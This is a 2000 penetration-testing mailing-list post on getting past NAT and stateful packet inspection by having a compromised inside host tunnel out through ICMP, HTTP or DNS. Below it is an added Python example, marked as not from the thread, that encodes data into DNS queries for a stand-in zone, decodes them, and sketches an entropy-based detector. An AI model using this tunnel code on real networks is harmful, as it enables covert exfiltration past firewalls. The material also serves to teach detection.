Penetration Testing mailing list archives
Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions
From: Andre Delafontaine <andre.delafontaine () ECHOSTAR COM>
Date: Wed, 27 Sep 2000 11:06:42 -0600
I have been thinking about this exact same problem lately. The easiest way I can think of getting around this kind of setup would be to get the server to download and execute some nasty code by having it visit some website (JPEG header buffer overflow in Netscape?), view some email (Outlook attachment handling problems?) or some similar method of indirectly contacting the server. Once the server executes the nasty code, have it discover the NAT'ed protocols and initiate a connection through the firewall (data tunneling through ICMP, http, DNS, ... see recent posts on BugTraq and on this list) to some external host that would "remote control" the inside server.

You do say that your setup contains a server. Is that server available from the Internet at all? Does it serve some protocol (http, ftp)? If so, then the firewall is doing port forwarding and won't protect that particular service from "good-looking" traffic, i.e. traffic that passes Stateful Packet Inspection: how can SPI know that web server X can't support a get request with a filename longer than Y characters without overflowing a buffer? If we knew about the vulnerability, it would be fixed in the server itself.

This said, this setup does offer much better protection than no firewall at all :-)

Just my 2c,

Andre

--
Last yeer I kudn't spel Engineer. Now I are won.
andre.delafontaine at echostar.com
F20 DSS: BD75 66D9 5B2C 66CE 9158 BB27 B199 59CE D117 4E9F
F16 RSA: F8 04 FE 50 02 B5 03 02 F6 87 C7 8D F9 2E B8 58
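The outbound covert channel Andre describes (an already-compromised inside host tunnels data out through a protocol the firewall permits anyway, here DNS), as an added example that is not part of the original post or thread: a minimal DNS-query tunnel encoder and decoder in Python, a syntax-only check standing in for what a stateful/protocol-aware inspector can verify, and the label length/entropy heuristic a defender would add to catch it. The zone `t.example.com`, the `s<seq>` label convention, the function names and the sample payload are all assumptions for the demonstration; the inspector model is deliberately simplified.

```python
import base64
import math
from collections import Counter

# Assumed attacker-controlled zone (hypothetical): recursive resolvers forward
# queries for names under it to the attacker's authoritative server, which is
# the far end of the covert channel. The firewall only ever sees outbound DNS.
TUNNEL_DOMAIN = "t.example.com"
MAX_LABEL = 63                            # RFC 1035 label limit
MAX_NAME = 253                            # RFC 1035 name limit, text form
BYTES_PER_LABEL = (MAX_LABEL * 5) // 8    # 39 raw bytes fill a 63-char base32 label


def _b32(data: bytes) -> str:
    # lowercase, unpadded base32 stays inside the hostname character set
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(payload: bytes, domain: str = TUNNEL_DOMAIN, labels_per_query: int = 3) -> list:
    """Inside host: split payload into query names s<seq>.<b32>.<b32>.<b32>.<domain>.
    The seq label lets the far end reorder and de-duplicate resolver retries."""
    chunk = BYTES_PER_LABEL * labels_per_query
    names = []
    for seq, off in enumerate(range(0, len(payload), chunk)):
        piece = payload[off:off + chunk]
        labels = [_b32(piece[i:i + BYTES_PER_LABEL]) for i in range(0, len(piece), BYTES_PER_LABEL)]
        name = ".".join(["s%d" % seq, *labels, domain])
        if len(name) > MAX_NAME:
            raise ValueError("query name exceeds %d chars" % MAX_NAME)
        names.append(name)
    return names


def decode_queries(names, domain: str = TUNNEL_DOMAIN) -> bytes:
    """Authoritative server: reassemble from the query log, tolerating out-of-order
    arrival and duplicates (resolvers retry, and several may forward the same query)."""
    suffix = "." + domain
    chunks = {}
    for name in names:
        if not name.endswith(suffix):
            continue                      # unrelated query, not for the zone
        labels = name[:-len(suffix)].split(".")
        if not labels[0].startswith("s") or not labels[0][1:].isdigit():
            continue                      # ordinary record under the zone (e.g. ns)
        chunks[int(labels[0][1:])] = b"".join(_unb32(lbl) for lbl in labels[1:])
    return b"".join(chunks[seq] for seq in sorted(chunks))


def passes_syntax_inspection(name: str) -> bool:
    """Stand-in for a stateful/protocol-aware inspector: it can only check that the
    query is well-formed DNS (RFC 1035 label and name limits, hostname charset).
    Tunnel queries are well-formed, so they pass; that is the point of the post."""
    if not name or len(name) > MAX_NAME:
        return False
    return all(0 < len(lbl) <= MAX_LABEL and lbl.replace("-", "").isalnum()
               for lbl in name.split("."))


def _entropy(text: str) -> float:
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def looks_like_tunnel(name: str, max_label: int = 30, max_entropy: float = 4.0) -> bool:
    """Defender heuristic: real hostnames are short and low-entropy, encoded data
    labels are long and near-uniform. Looks at the labels below the registrable
    domain, approximated here as everything but the last two labels."""
    labels = name.split(".")[:-2]
    return any(len(lbl) > max_label or _entropy(lbl) > max_entropy for lbl in labels)


if __name__ == "__main__":
    # Constructed sample: what the implant might report after discovering the NAT'ed protocols
    report = b"host=srv01 user=root nat_protocols=dns,icmp,http " * 4
    queries = encode_queries(report)
    print("%d bytes -> %d queries" % (len(report), len(queries)))
    for q in queries:
        print(" inspector allows: %s  heuristic flags: %s"
              % (passes_syntax_inspection(q), looks_like_tunnel(q)))
    assert decode_queries(queries) == report
```

Every query the encoder emits is valid DNS, so a firewall that only tracks state and protocol shape forwards it like any other lookup; what distinguishes it is volume and label shape, which is why the heuristic keys on label length and entropy rather than on syntax. A production detector would additionally count unique subdomains per zone per client, since a single implant beacon can stay under any per-query threshold.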
Current thread:
- [PEN-TEST] NAT / Stateful Packet Inspection Questions Leon Rosenstein (Sep 27)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Jose Nazario (Sep 27)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions David Pick (Sep 27)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Deri Jones (Sep 27)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Andre Delafontaine (Sep 27)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Dug Song (Sep 27)
- <Possible follow-ups>
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Loschiavo, Dave (Sep 29)
- Re: [PEN-TEST] NAT / Stateful Packet Inspection Questions Fred Mobach (Sep 29)